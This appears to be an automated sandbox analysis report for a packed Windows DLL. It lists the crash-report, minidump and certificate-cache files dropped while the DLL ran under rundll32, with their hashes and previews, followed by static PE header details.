                                                                                                                                    SSDEEP:6:yFD8eESeb43rcX3sVIKj5j+25V4dZ/XX+urVjBd55qWeeeeeeeeeeeeeA:8DXzes3rE/+5S25VG/H/BdohppppppA
                                                                                                                                    MD5:B8CACBB7EA521952F7BB64A0FCAE758D
                                                                                                                                    SHA1:0C825C156DC016F9D67AF83351CC073B58B0F2F7
                                                                                                                                    SHA-256:469FBD11FC971560A0C9A24CDEE404B21AF0DF88E3AA6EDC4D864CB8E2280F82
                                                                                                                                    SHA-512:BC0729AA41EFE84C58610309AF47F34EFB4A0923746EBA704C37F2610B10A4B463CBB3ED73D67CADB0F3FA19ECAE06ACE40095F1C78BFCB29B05CE645A721ACC
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..2024-12-21 14:47..iOffset....2024-12-23 05:33..iOffset....2024-12-24 01:45..iOffset....2024-12-24 23:43..iOffset....2024-12-25 21:06..iOffset....2024-12-26 18:29..iOffset....2024-12-28 20:40..iOffset....2024-12-30 00:53..iOffset....2025-01-02 06:59..iOffset....2025-01-04 09:42..iOffset....2025-01-06 22:30..iOffset....2025-01-10 09:13..iOffset....2025-01-15 18:06..iOffset....2025-01-21 03:39..iOffset....2029-01-31 19:25..iOffset....iOffset....iOffset....iOffset....iOffset....iOffset....iOffset....iOffset..

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d2d6a05f617930bde2d4c76b2a5555e299272ba9_7522e4b5_5f1c7989-247a-4c50-9e06-04646fa13281\Report.wer

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):65536
                                                                                                                                    Entropy (8bit):0.9517020163304682
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:M4ri+OD30BU/wjeTYWaZYzuiF5Z24IO8dci:bri/DEBU/wjeMbYzuiF5Y4IO8dci
                                                                                                                                    MD5:6605C07F491D58D84631303E0EED2379
                                                                                                                                    SHA1:4DA674EE5462E54378746698A42C95DD3F4D83AB
                                                                                                                                    SHA-256:EC63D8D93B0ACBAFCAB74210FD182B203BB417D557901C0C33B9AFD8F906F96C
                                                                                                                                    SHA-512:EAA2C9D16D86508D2CD343AA4346514D9993E291F8438C6352BC68DECF50938C2A8747306FF85029BA66601A7C39952D2B9717974171AD95453A021996991FA0
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.3.0.0.1.1.5.2.7.8.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.3.0.0.4.8.8.7.1.7.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.1.c.7.9.8.9.-.2.4.7.a.-.4.c.5.0.-.9.e.0.6.-.0.4.6.4.6.f.a.1.3.2.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.d.0.6.8.3.7.-.0.6.c.6.-.4.b.9.8.-.9.f.7.7.-.b.4.e.2.f.b.1.8.f.6.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.4.-.0.0.0.1.-.0.0.1.4.-.c.3.5.8.-.1.f.5.6.2.4.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fee72e296cfe876676a0f903eac30ffbede4e6_7522e4b5_a426942b-9cc1-4632-ad20-a40ad980015f\Report.wer

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):65536
                                                                                                                                    Entropy (8bit):0.95110139476131
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:mK2ixO9v0BU/wjeTIWaZYzuiF5Z24IO8dci:mziI9cBU/wje8bYzuiF5Y4IO8dci
                                                                                                                                    MD5:8A639D0657B936FED790168F99471FAA
                                                                                                                                    SHA1:F90EB8B46EE8444AAE247B4204AB9081F88B37BB
                                                                                                                                    SHA-256:C3AB4A992170FC4AA1D72144092530E30A3731E7EA0780026E93BC2884A1E153
                                                                                                                                    SHA-512:F9A88B395C44E3181C22184AB2F5BC3498514BDCBC2945BFF972E0E489DDD5719716E920D9B9FF6A35D8DD6AD6C210481644CE4632CF450F66FF465FCD557527
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.3.0.0.4.5.2.5.5.6.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.3.0.0.4.9.9.4.3.1.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.2.6.9.4.2.b.-.9.c.c.1.-.4.6.3.2.-.a.d.2.0.-.a.4.0.a.d.9.8.0.0.1.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.6.f.0.4.5.8.-.1.9.1.c.-.4.7.7.6.-.a.d.d.d.-.8.9.e.e.d.7.f.6.4.9.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.4.0.-.0.0.0.1.-.0.0.1.4.-.0.e.a.9.-.f.0.5.9.2.4.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6CF.tmp.dmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:43:24 2024, 0x1205a4 type
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):45656
                                                                                                                                    Entropy (8bit):1.9807460023759487
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:whd7sElZRYXtXDr1p1O5H4LPW/TLmGfN62v7:enlZRsr1pY5HKPW/XmGV7
                                                                                                                                    MD5:89E869CE8D7782AA91359250C8328F41
                                                                                                                                    SHA1:03CDB834687A882298F25A4109E974CB6B9B80AD
                                                                                                                                    SHA-256:83CF315C2CCD88970FB933963E507175CA31748CDC6E96C51FCF0B90917A5A5C
                                                                                                                                    SHA-512:985866E6115B19585E3795C00C1AAB0BEB09B2F6931C965536785142477DCBFD48FED681040042C6F1C9F0F603C21344731698834D4BA13AEB7A2B477EDBAA0D
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:MDMP..a..... ........1dg........................................V/..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T.......$....1dg.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC353.tmp.WERInternalMetadata.xml

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):8270
                                                                                                                                    Entropy (8bit):3.693794831606281
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:R6l7wVeJSJ6de6YYm67gmfTZYprE89bR9sfLbm:R6lXJM6E6Yx67gmfTZER2f2
                                                                                                                                    MD5:77A2F35C8B44981C4E910278AC523636
                                                                                                                                    SHA1:95D01B928FB85D036339F05CFC7D07A0388FEDE7
                                                                                                                                    SHA-256:E3CB929E3FF8AE6377F93996969E2C923B16588984DD8D6DD42B9347C40101D2
                                                                                                                                    SHA-512:C003310BB4B270DAC0730EAE15D2FE51F93B75E4A5EBAD06E28352FF1B7021A355E5D382E7A30DABB64E6900A9E0D27D9210F6BFE05F60C41C4B0605DF5DEF79
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.1.6.<./.P.i.

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3B2.tmp.xml

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4654
                                                                                                                                    Entropy (8bit):4.465563916177719
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:cvIwWl8zsMiJg77aI9uBWpW8VYrYm8M4JCdPSFx1+q8/AQGScSNd:uIjfMwI7EQ7VnJp1IJ3Nd
                                                                                                                                    MD5:C3133680F2160290D7AC8A9FD73C8FEB
                                                                                                                                    SHA1:FC4418609140EA424157218F7FA28DC3D390B536
                                                                                                                                    SHA-256:535DC7FD9C311A075FE78ABE626990365389CD4D3C721E55F6CAD946D3D226B7
                                                                                                                                    SHA-512:128FED3E4D57B724E2E3F46AD440B93EA400495C0ED61B9D21C40188F9AE8615296991E1E3FA7AC5B9D50FD638FAC64AB74117AAC7B931A32089139A29C53785
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638266" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3BF.tmp.dmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:43:24 2024, 0x1205a4 type
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):44134
                                                                                                                                    Entropy (8bit):2.030193676714978
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:wkmELZRYXtXRm1O5H47HbZGA0kBUUlS1QZ5+:zLZRqmY5HaHbDTUiSO
                                                                                                                                    MD5:408C65C9077C928D27AA3EA5C1D8BFFC
                                                                                                                                    SHA1:A47B66B348E8C204F9568848EE06055053576B25
                                                                                                                                    SHA-256:7EE4F4998A6F78CF5C71368A85C668FF9E9398AF3B965626F401EC0DCEA4DD46
                                                                                                                                    SHA-512:B4FE8DD123089283B606750184BDAF52245660677D4D5944DFC217C0C1733A6FAA8C0B3DD7D39279F4E2A25CB5BDB9FCC0010C0C0409572A4CDD324168AB58DD
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:MDMP..a..... ........1dg........................................V/..........T.......8...........T..........................L...........8...............................................................................eJ..............GenuineIntel............T.......@....1dg.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4AB.tmp.WERInternalMetadata.xml

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):8270
                                                                                                                                    Entropy (8bit):3.6930834721870682
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:R6l7wVeJ1L6de6YYr67gmfTxYpr589bRjsf0zbm:R6lXJ56E6YM67gmfTxDRIfb
                                                                                                                                    MD5:26D8DB8482FCF14BF880935728888C66
                                                                                                                                    SHA1:07F4657AB3943C0C3A758E9778D0DC080D0A03F5
                                                                                                                                    SHA-256:D9367FEFF74E95BF5A1A0C7406438DBCB14FF4E2156DF65ABF13E64235F7454F
                                                                                                                                    SHA-512:28293C31C7337CFDBB469738533B4ED901146391C486FE2E6C3F78632912382A8EF37E25FC29BDFBA7412195C2B6FDF7DF42C39A8217BA04B5D4E581ED3B9417
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.0.0.<./.P.i.

                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4DB.tmp.xml

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4654
                                                                                                                                    Entropy (8bit):4.463345052467359
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:cvIwWl8zsMiJg77aI9uBWpW8VYqYm8M4JCdPOFYT+q8/AxGScSUd:uIjfMwI7EQ7VqJSJJ3Ud
                                                                                                                                    MD5:BA1D996487CB666A32951CFE2A9A216F
                                                                                                                                    SHA1:B9DDF7D43090518069F5C1FD916F0FA922951538
                                                                                                                                    SHA-256:1C3F247F30558E0EFEF13154AAB2B341694E761A9756FA30D0E7AF2C4A055614
                                                                                                                                    SHA-512:688FBFB8C5B178913028748209AE5D6D3A4C6756F3D2EA05E35F0A19C5E3AE3B6B279E2C0F7C63EEA72FB316256A996B383A2B2BF372D8BEE5BFAD3043530246
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638266" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):71954
                                                                                                                                    Entropy (8bit):7.996617769952133
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):328
                                                                                                                                    Entropy (8bit):3.1483147145857515
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:kKwHH3l99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:IHH3lkDnLNkPlE99SNxAhUe/3
                                                                                                                                    MD5:259B84979B2DC6F1525C26394D999D37
                                                                                                                                    SHA1:64D09F7F2D835764FFC7473A01ACC5829F46A545
                                                                                                                                    SHA-256:8217180869810863B8AFBA25E6943C981277479198403FBB94127E78AD5C2D14
                                                                                                                                    SHA-512:682681CE1976A2D0C802E4F1CC0A414DB64A0A47777E6C0CE5F02C1E225E2016A285CD24D6BAEDEE3915DA67F7D87893ED23C37CAF0B8A5DB8AA3E28F664FAF6
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:p...... ............{9".(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1835008
                                                                                                                                    Entropy (8bit):4.4174667963889815
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:vcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNo5+:Ui58oSWIZBk2MM6AFBWo
                                                                                                                                    MD5:B9CB3FB5740B5C8DD26A1C5FE89A13EF
                                                                                                                                    SHA1:5C557774D15B7BEEB4EFFDD726F8ED54116E5867
                                                                                                                                    SHA-256:F6DF803626CC32C074A2E057D3710BFBB79F3AC2174EEA76880B61596785AE40
                                                                                                                                    SHA-512:F0895E4A61BCA5A14B70BC576A6DF053F910A7642F361DE7D01DBA832A3E8B358FB17C2CDFB26FA75BB3CC434CA60528A8D4141BCA853A0A35A95E7545689588
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.1.X$R..............................................................................................................................................................................................................................................................................................................................................(.hl........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows, PECompact2 compressed
                                                                                                                                    Entropy (8bit):6.536809941748854
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:4hSuRTwnWJ.dll
                                                                                                                                    File size:323'160 bytes
                                                                                                                                    MD5:8d7405be2b8547960e9c68184d273fa4
                                                                                                                                    SHA1:0e275564dda101e8ea8a47cd5469a7f8ea90c77c
                                                                                                                                    SHA256:7f2b01e4a8eb8f0f1e7710f51dcad9963d1d4fd5be7a89b9115cb0176cf4f007
                                                                                                                                    SHA512:cc246999b22568de7db634852c5a2fb58b23f04b1cac72d831184cfbb20be7824d3c4e8590bdf07d7c1cb46b71c5013f2f317b0c09f392f8fe1c4cd95a9cce07
                                                                                                                                    SSDEEP:6144:/u9FQ7867saFPJf3p2hjzM0hsf3e7nq87YvRC8BjVbdYC3u5SzKQNVzFqUsGczjE:cY9saFPhpd0hsfOjqjkEjRy9Qfzzc3E
                                                                                                                                    TLSH:8164AF01736293F6C8D709329EE5E72EE3346410ADD8EE62DFC214856CD345BA95A3CB
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:7ae282899bbab082

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x10041ddd
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x10000000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
                                                                                                                                    DLL Characteristics:
                                                                                                                                    Time Stamp:0x565BD507 [Mon Nov 30 04:48:07 2015 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:dbca5d324ec49b89414af308d3b9afbd

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    call 00007F66008B0E8Bh

                                                                                                                                    Rich Headers

                                                                                                                                    Programming Language:
                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                    • [ C ] VS98 (6.0) build 8168
                                                                                                                                    • [C++] VS98 (6.0) build 8168
                                                                                                                                    • [RES] VS98 (6.0) cvtres build 1720
                                                                                                                                    • [LNK] VS98 (6.0) imp/exp build 8168

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x4b10c0x68.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3ee8c0x118.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000xf8.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
